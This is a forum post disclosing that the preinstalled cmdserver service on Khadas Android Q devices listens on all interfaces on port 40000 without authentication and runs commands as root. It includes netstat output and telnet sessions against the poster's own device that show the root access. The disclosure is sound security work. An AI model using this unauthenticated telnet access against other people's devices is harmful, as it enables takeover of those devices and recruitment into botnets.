Hi @tenk.wang, @jasonl, @goenjoy
Could you please point myself where are sources of cmdclient and cmdserver binaries in Android source ?
So far as I can understand they are shipping as precompiled binaries with Android Q source tree and I’m bit worry about leaving such a big security hole… as I see that cmdserver exposes an open port and is backend for cmdclient which in its turn allows to execute anything with root privileges
tcp 0 0 0.0.0.0:40000 0.0.0.0:* LISTEN 4229/cmdserver
kvim3l:/system/bin # netstat -taup
Active Internet connections (established and servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program Name
tcp 0 0 0.0.0.0:40000 0.0.0.0:* LISTEN 4229/cmdserver
tcp6 0 0 :::5555 :::* LISTEN 3495/adbd
tcp6 0 0 ::ffff:192.168.1.7:5555 ::ffff:192.168.1.:52204 ESTABLISHED 3495/adbd
udp 0 0 192.168.1.7:bootpc 192.168.1.1:bootps ESTABLISHED 3678/system_server
udp 0 0 0.0.0.0:mdns 0.0.0.0:* 3540/mdnsd
udp 0 0 0.0.0.0:38125 0.0.0.0:* 3540/mdnsd
udp6 0 0 :::mdns :::* 3540/mdnsd
udp6 0 0 :::41445 :::* 3540/mdnsd
kvim3l:/system/bin $ cmdclient id
uid=0(root) gid=0(root) groups=0(root) context=u:r:cmdserver:s0
kvim3l:/system/bin $
I understand that it used to perform khadasapi functions inside but opened port for all interfaces - isn’t something I’m happy my device is doing… perhaps it should be bound to localhost only (127.0.0.1) - otherwise it is nice chance to get a botnet from khadas devices.
it is so unprotected - it is real security hole - it is enough a simple telnet client to run any command on Khadas Android Q (which have cmdserver installed by default)… Here is nice example of telnet session from my workstation to my khadas device (no password, no checking… nice backdoor)
% telnet 192.168.1.7 40000 22:28:45
Trying 192.168.1.7...
Connected to 192.168.1.7.
Escape character is '^]'.
id
uid=0(root) gid=0(root) groups=0(root) context=u:r:cmdserver:s0
% telnet 192.168.1.7 40000 22:29:04
Trying 192.168.1.7...
Connected to 192.168.1.7.
Escape character is '^]'.
lsacct
bin
boot
bugreports
cache
charger
config
d
data
default.prop
dev
etc
init
init.environ.rc
init.rc
init.recovery.amlogic.rc
init.usb.configfs.rc
init.usb.rc
init.zygote32.rc
lost+found
metadata
mnt
odm
oem
proc
product
sbin
sdcard
storage
sys
system
ueventd.rc
vendor
@hyphop -
“Шеф! У нас дыра в безопасности!
Ну хоть что-то у нас в безопасности.”